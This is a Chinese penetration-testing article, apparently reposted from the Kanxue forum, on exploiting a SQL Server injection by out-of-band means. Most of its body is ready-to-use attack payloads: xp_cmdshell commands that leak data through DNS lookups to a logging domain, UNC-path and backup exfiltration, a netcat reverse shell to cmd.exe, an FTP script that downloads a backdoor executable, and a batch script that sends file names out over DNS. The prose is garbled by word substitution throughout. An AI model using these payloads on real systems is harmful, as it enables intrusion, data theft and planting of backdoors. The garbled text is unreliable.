原文首发:看雪论坛 http://bbs.pediy.com/thread-213756.htm
在很多场景中,WEB是渗透测试的一个相对随意马虎的入口。常日经由测试授权后,我们会先考试测验拿到一个WEBSEHLL,然后再通过各种方法提权,来掌握一台内网机器,然后利用这台内网机器掌握全体内部网络。
在进行WEB渗透的时候,我们常日会通过后台弱口令、SQL注入、XSS、任意文件上传等漏洞来进行攻击测试。在测试的时候我们会根据做事器返复书息来判断漏洞是否存在,也是根据做事器返回的信息来判断我们能否成功实行命令,能否成功读取做事器上的文件。因此我们在进行渗透测试的时候,能否及时得到做事器相应的反馈信息尤为主要。本文将通过实际研究,来探求各种及时得到做事器相应数据的技能、方法,为渗透测试铺平道路。下面将仿照一个实例来进行研究剖析。
如果在渗透测试的时候,我们通过对主域名进行C段扫描,创造了一个子域名,并且该子域名存某处存在sql注入漏洞,通过测试创造,该注入点支持UNION查询如图:
从返复书息我们能够知道数据库版本,也知道了数据库做事器是 windows 操作系统。但是给做事器发送HTTP要求后,返回数据包如下:
通过返回的数据,我们判断做事器是LINUX系统。从目前的信息来看,WEB做事器在一台LINUX系统上,然而它利用的数据库在一台WINDOWS系统上。这样我们就无法直接通过数据库操作来得到一个WEBSHELL了。接下来我们的思路是想办法来掌握这台数据库做事器,从而得到一台内网做事器的权限,然后再去渗透其他内部做事器。
首先我们对数据库当前用户的权限进行判断:
返回正常信息,由此我们判断数据库当前用户具有系统管理员权限。这个时候本以为大略地用sqlmap跑一下 就直接可以结束事情了。
我们可以看到这个时候sqlmap并没有正常事情,可见sqlmap无法直接对https的连接进行注入。这里有个小技巧,我们让sqlmap通过代理访问网络就可以达到目的。首先配置好burp让burp可以成功抓取https数据包,然后用burp作为代理,在实行sqlmap时加上参数 –proxyhttp://127.0.0.1:8080,这样该当就可以了。实际测试时候创造,sqlmap自带的useragent 导致要求的数据包没有返复书息,因此我们加入了参数—user-agent ‘’ ,我们测试如下:
已经可以正常注入了,可以看出支持UNION,支持多行查询。然后我们加个参数—os-shell看看能不能得到一个命令行下的SHELL
Sqlmap这时候非常不给力,我们实行的命令根本没有返回结果,也可能命令根本并没有实行成功。这时候只有我们空手发迹了。
数据库具有系统管理权限,sqlmap实行os-shell时已经提示了xp_cmdshell规复成功,我们想到的首先便是通过xp_cmdshell实行命令。当然我们是无法看到命令实行结果的,我们通过ceye.io申请了一个账户,准备通过DNS记录来看实行命令成功与否。通过ping 然后查询dns记录来判断命令知否实行成功
https:///.php?id=21;EXEC xp_cmdshell 'ping a1..ceye.i
很幸运,我们看到了DNS记录的结果
解释可以成功实行命令。然后我们试图想通过数据组件合营DNS记录来得到命令实行情形。在研究过程中,我们总结了以下方法来进行信息密查。
1、利用HttpRequestData
DECLARE @returnText VARCHAR(500);DECLARE @status int;DECLARE @urlStr VARCHAR(255);SET @urlStr ='http://ddd..ceye.io/a';EXEC P_GET_HttpRequestData @urlStr, @status OUTPUT, @returnText OUTPUT
2、通过共享路径来实行程序
https:///.php?id=21;declare
@@hp varchar(800);set @@hp=db_name(0);exec('exec xp_cmdshell
''\\'%2b@@hp%2b'..ceye.io\a.exe''')
//%2b //连接变量的时候最好把+编码,否则传过去会是空格,导致命令不堪利;这里实行命令测试时须要嵌套在外部exec里才能成功到DNS,其余''是两个单引号。
3、数据库备份:
先实行create database rain;然后:
declare @@hp varchar(800);set @@hp = db_name();exec('backup log [rain] to disk=''\\'+@@hp+'. .ceye.io\a.exe'';');-- //+记得编码
4、把命令实行结果保存到变量,再写入数据库,然后查询数据库的信息来查看命令返回结果
create table test(t1 nvarchar(255), id int);DECLARE @result varchar(255);EXEC xp_cmdshell 'ping mytest1..ceye.io',@result out
put;insert into test(t1) values(@result);
再查询结果and 1=(select top 1 t1 from test) 或者and 1=(select count() from test where t1>1)
5、把文件读入数据库 再查询来看文件
;drop table cmd;create table cmd (a text);BULK INSERT cmd FROM 'c:\boot.ini' WITH (FIELDTERMINATOR = '\n',ROWTERMINATOR ='\n\n')
6、访问共享目录实行后门程序
\\\web\server.exe
(目前可能只有某些国外VPS才能访问共享目录)
7、利用nc反弹
做事端nc -vv ip 8090 -e c:\windows\system32\cmd.exe
客户端nc -vv -l -p 8090
8、ftp上传、下载文件:
首先有个好用ftp做事器Quick Easy FTP Server V4.0.0 可以记录访问日志
通过ftp open命令可以记录做事器外部IP地址,扫描创造未开放任何端口
最初上传的时候由于没有判断目录是否可写 一贯考试测验失落败
后来意识到目录权限的问题了,然后找了个目录c:\windows\temp\
首先写一个bat ,里面的命令是ping dns 然后实行bat看DNS访问记录 如果成功
接下来:
echo open >c:\windows\temp\ftp1.txt
echo x>>c:\windows\temp\ftp1.txt
echo x>>c:\windows\temp\ftp1.txt
echo binary >>c:\windows\temp\ftp1.txt
//下载到指定目录
echo get server.exe c:\windows\temp\server.exe >>c:\windows\temp\ftp1.txt
echo bye >>c:\windows\temp\ftp1.txt
ftp -s:c:\windows\temp\ftp1.txt
del c:\windows\temp\ftp1.txt
通过查看ftp做事器日志 可以判断是否下载成功。
9、利用bat脚本来实现信息密查
dir /b/a-d/od c:\windows\temp >test.txt // dir /b/a-d/od 得到目录里的文件名
for /f \"大众delims=:\"大众 %%a in (test.txt) do (ping %%a..ceye.io) //把文件名发送到DNS记录
本地测试结果如下:
文件名带入了ping要求里了,这时我们看看DNS日志记录:
成功读取到了文件名
实际在命令行写入bat脚本的时候 要把稳用^来转义< >符号,%须要编码成%25。
实现脚本如下:
echo dir /b/a-d/od c:\windows\temp ^>test.txt > c:\windows\temp\dir.bat
echo for /f \公众delims=:\"大众 %25%25a in (test.txt) do (ing %25%25a..ceye.io) >>c:\windows\temp\dir.bat
本文由看雪CrackMe 版主 netwind 原创
❤ 往期热门内容推举
报名 |《走近企业看安全》第10站 知道创宇
国产电纸书 Bambook 破解条记(一)
cocos2dx lua 反编译
HG533路由器剖析教程之二:征采固件
HG533路由器剖析教程之找到硬件调试接口
漏洞剖析 | CVE-2017-7269:IIS6.0 远程代码实行漏洞逆向剖析记录
......
更多精良文章,“关注看雪学院"大众号”查看!
看雪论坛:看雪安全论坛
微信"大众年夜众号 ID:ikanxue
微博:看雪安全
投稿、互助:看雪学院
